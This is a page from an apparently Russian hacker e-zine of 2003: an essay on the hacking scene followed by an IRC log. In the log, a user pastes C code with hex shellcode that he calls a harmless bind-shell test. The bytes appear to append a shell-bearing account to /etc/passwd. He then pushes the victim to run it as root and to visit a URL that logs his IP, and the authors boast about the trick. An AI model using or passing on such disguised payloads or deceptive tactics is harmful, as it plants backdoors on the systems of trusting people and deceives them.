[ Prev Page | Goto Content | Next Page ] =/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\ ...scene not dead... Эта статья философского характера, мы просто решили порассуждать на тему "куда катится RU-сцена". N0w видимо стало модным поднимать эту тему - уже в двух новых зинах (FDS и Dark Deamon)были такие статьи. Что тут сказать, учитывая хотя бы то сколько ошибок в даргоне ( ака Dark Deamon aka Дурагон - как сказал кто-то из наших ;)). Все вдруг посчитали что хакеры всего мира должны сплотиться и чё-то там устроить. Понеслись вселенские лозунги, типа спасём рунет, сцену, etc.. А дальше слов дело как всегда не заходит ! Многие как только найдут уязвимость в каком либо продукте сразу шлют во все рассылки advisory. Прошло время hack teamz но теперь стали плодиться бесчисленные cewl security teamz. Всё посчитали что full disclosure это круто, это безопасно. Только вот script-кидисов меньше не становится... После появления статьи про приватные зоны на nteam.ru у некоторых могло возникнуть ложное впечатление что вот оно, решение - попрятать все сплоиты, а адвизори сделать общедоступными. Но это тоже не выход (хотя приятно когда знаешь где можно "позаимствовать" нужный stuff )). Security spertz получают немалые деньги за то, что ищут баги в варезе. Их считают элитой, хотя для них уже давно главную роль играют деньги. Это уже не сцена, а их "сфера экономики". Мля.. >;Pp А где же сейчас реальная сцена? А вы её и не видете. Хотя нет, ошибка.Вы часто слышите о появлении новых червей, вирусов ( не тупых вордовых или сгенерённых ), взломах крупных проектов неизвестными людьми. "Обнадёживающий" BQ неожиданно для кучи кидисов и админов выдал m00-mod_gzip.c.. Не говоря про то, соколько фанатов появилось у му. Была продемонстрироана обратная сторона full-disclosure ;)) А ведь похожие вещи случались и до этого - трояны в сплоитах, etc.. Короче, к чему мы клоним - поменьше слов, побольше дела. Недавно мы набрели на сайт зина LmD и были приятно удивлены - после прочтения трёх номеров (ждём четвёртый )) остались отличные впечатления. Доки там в таком old-sch00l'ьном стиле что прям повеяло стариной )) Респект, парни! Жаль журнала не хватает, чтобы выразить все мысли... Но мы надеемся, что хоть кто-то оценит нашу работу. old_school, n3w\x20sCh001... Эти понятия очень, очень относительные. Что такое blackhat тоже многие знают смутно. Для нас это человек, занимающийся взломами только для себя. Делиться инфой _нужно_, но не мы не даём готовых ready2use вещей. Кто хочет, тот поймёт. Это не сфера обслуживания и если вам не нравится то что мы делаем закройте рот (lovchy, ur NOT our fuckin client) и не мешайте. "Let tell you something, I'LL PUSH YOU BACK!!" (c) Interloper, Slipknot 1999 >>> P.S. 2 movl: на тему кто из нас ламак. Это была глюкавая бета, но факт - ты попробывал его. Логи старые, просто попались под руку. Так что не ори, что мы сакс, а ты cewl-HaX0r. eXORc157: check force (Nov 15 2003) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 03:31:24 <eX0Rc157> yo, man! 03:32:04 <eX0Rc157> ur online? [movl has address [email protected]] 03:32:05 <movl> yo 03:32:24 <movl> yeah :) 03:32:30 <eX0Rc157> =) 03:32:35 <eX0Rc157> ti v linuxe? 03:32:49 <eX0Rc157> if "y" mozesh pomoch? 03:32:52 <movl> da 03:33:10 <movl> a v chem trabla? 03:33:11 <eX0Rc157> a kakaya veria? 03:33:13 <eX0Rc157> a kakaya versia? 03:33:27 <movl> Mandrake 8.2 03:33:41 <eX0Rc157> o, kputo 03:34:28 <movl> tak tebe zachem? 03:34:59 <eX0Rc157> #include <stdio.h> 03:34:59 <eX0Rc157> 03:34:59 <eX0Rc157> char bindshellcode[] = 03:34:59 <eX0Rc157> "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x63\x2F\x70\x61" 03:34:59 <eX0Rc157> "\x68\x2F\x2F\x65\x74\x89\xE3\x66\xB9\x01\x04\xB0\x05" 03:34:59 <eX0Rc157> "\xCD\x80\x89\xC3\x31\xC0\x50\x68\x2F\x73\x68\x0A\x68" 03:34:59 <eX0Rc157> "\x2F\x62\x69\x6E\x68\x74\x6D\x70\x3A\x68\x3A\x33\x3A" 03:34:59 <eX0Rc157> "\x2F\x68\x38\x36\x3A\x30\x68\x73\x3A\x3A\x39\x68\x2F" 03:34:59 <eX0Rc157> "\x73\x68\x0A\x68\x2F\x62\x69\x6E\x68\x6C\x69\x62\x3A" 03:34:59 <eX0Rc157> "\x68\x36\x36\x3A\x2F\x68\x3A\x30\x3A\x36\x68\x6D\x3A" 03:34:59 <eX0Rc157> "\x3A\x30\x89\xE1\xB2\x30\xB0\x04\xCD\x80\x31\xC0\xB0" 03:34:59 <eX0Rc157> "\x06\xCD\x80\x31\xC0\x40\xCD\x80"; 03:34:59 <eX0Rc157> 03:34:59 <eX0Rc157> int 03:34:59 <eX0Rc157> main() 03:34:59 <eX0Rc157> { 03:34:59 <eX0Rc157> void (*funct) (); 03:34:59 <eX0Rc157> (long) funct = &bindshellcode; 03:34:59 <eX0Rc157> funct(); 03:34:59 <eX0Rc157> } 03:35:03 <eX0Rc157> shellcode potestit 03:35:19 <eX0Rc157> on slushaet port a potom prosto virubaetsa 03:35:38 <eX0Rc157> gcc -o x86 x86.c; netstat -an | grep 3133 03:35:57 <eX0Rc157> esli uvidish LISTEN, znachit vorkaet shellcode 03:36:08 <eX0Rc157> mozesh pomoch s etim? 03:36:18 <movl> ok 03:37:08 <eX0Rc157> nu kak? 03:37:31 <movl> seichas **** ENDING LOGGING AT Sat Nov 15 03:37:36 2003 **** BEGIN LOGGING AT Sat Nov 15 03:37:36 2003 03:38:44 <movl> nifiga 03:38:49 <eX0Rc157> fuck... 03:39:00 <eX0Rc157> navernoe s parametramy socket'a pereboshil... 03:39:04 <eX0Rc157> SPASIBO 03:39:17 <eX0Rc157> mlah, a to nikto protestit ne mog 03:39:39 <eX0Rc157> budu chitat manz ;) 03:39:52 <movl> da nezashto 03:41:40 <eX0Rc157> a kakoi u tebia irc-client? 03:41:49 <eX0Rc157> pod X? 03:41:55 <movl> ugu 03:42:07 <eX0Rc157> x-chat? 03:42:13 <movl> irssi ne prikalivaet 03:42:27 <movl> slushai a tebe zachem? 03:42:47 <eX0Rc157> uchus codit 03:43:11 <movl> i kak? 03:43:20 <eX0Rc157> da kak vidish ne ochen ;) 03:43:46 <eX0Rc157> pod freebsd pishu shellcodz, a pod linux- ne katit 03:44:18 <eX0Rc157> a ti chem zanimaeshsya? 03:44:20 <movl> paradox, pod frjahu trudnee pisat' po idee 03:44:37 <eX0Rc157> nea, esli ti s nei rabotaesh postoyanno ;) 03:44:47 <movl> da chem pridetsa :) 03:44:54 <eX0Rc157> a s linxuom kak to malo stalkivalsa 03:45:07 <eX0Rc157> ti coder? 03:46:05 <movl> nu kak skazat', ja sam seichas itayus' shellcodi pisat' 03:46:11 <movl> nu kak skazat', ja sam seichas pitayus' shellcodi pisat' 03:46:26 <eX0Rc157> nu i kak? 03:46:33 <eX0Rc157> poluchaetsa? 03:46:53 <movl> poka primerno tozhe samoe, chto i u tebja :) 03:47:13 <eX0Rc157> heh 03:47:31 <eX0Rc157> a u tebya comp doma? ili ti na shelle sidish? 03:48:02 <movl> nu na eto ja otvechat' ne budu :) 03:48:14 <eX0Rc157> i eshe, zabil sprosit - arch x86? 03:48:33 <eX0Rc157> a to mozet m68 ili 4e to drugoe? 03:48:43 <eX0Rc157> ;) 03:48:44 <movl> x86 03:48:47 <eX0Rc157> hmm 03:48:52 <eX0Rc157> lana, stranno 03:49:21 <movl> a chto po idee dolzhen bil rabotat'? 03:49:42 <eX0Rc157> aga 03:49:54 <eX0Rc157> prosto slushat port 03:50:06 <eX0Rc157> a kogda k nemu conect - on padaet 03:50:44 <movl> escho raz proveril voobshe ego ne proslushivaet 03:51:49 <eX0Rc157> da, ploho... 03:53:27 <eX0Rc157> a ti iz m00? ;) 03:53:39 <eX0Rc157> tipa m00vl ;) 03:54:09 <movl> net :))) 03:54:12 <eX0Rc157> hehe 04:01:48 <eX0Rc157> mda... 04:02:03 <movl> chto? 04:02:07 <eX0Rc157> a v mandrake 8.2 lynx est? 04:02:37 <movl> est' 04:02:38 <eX0Rc157> ti ksta pod rootom zapuskal shellcode? 04:02:46 <movl> on vo vseh linuhah est' 04:02:57 <eX0Rc157> aga, no voobshe hz 04:03:07 <eX0Rc157> nabey 'lynx iii.h11.ru' 04:03:11 <eX0Rc157> just 4 expl 04:03:15 <movl> da net pod prostim 04:03:30 <eX0Rc157> potom prover pod rootom 04:03:33 <eX0Rc157> hotya... 04:03:35 <eX0Rc157> hz 04:03:38 <movl> a chto tam? 04:03:56 <eX0Rc157> mozet s socket'ami root mozet toka rabotat - port 1-1024 04:04:03 <eX0Rc157> prover 04:04:18 <eX0Rc157> vozmozno ya port postavil vmesto 3133 133 ;) 04:04:35 <movl> :) 04:05:01 <eX0Rc157> ruki iz zopi rstut mlah ;) 04:05:34 <movl> nu otkril 04:05:59 <movl> tam statija pro vvedenie v perepolnenie bufera 04:06:31 <eX0Rc157> v lynx'e otkril? 04:06:51 <movl> da 04:06:56 <eX0Rc157> tam prostp tag <xml> 04:07:03 <eX0Rc157> normalno vidno? 04:07:13 <eX0Rc157> u menya gluchilo =) 04:07:25 <eX0Rc157> ya nah mozillu zapustil =) 04:07:36 <movl> vse ok 04:07:42 <eX0Rc157> kputo 04:08:10 <eX0Rc157> potest pod rootom shellcode 04:08:14 <eX0Rc157> plz ;) 04:08:31 <movl> ok 04:08:52 <movl> port 3133? ili vse-take net? :) Всего за 30 минут общения ты успел потестить мой шеллкод, засветить свой ip (access.log best), да ещё и рассказать о своей системе. В следующий раз прежде чем орать что-либо подумай как следует, или хотя бы аргументируй свой трёп )) [ Prev Page | Goto Content | Next Page ]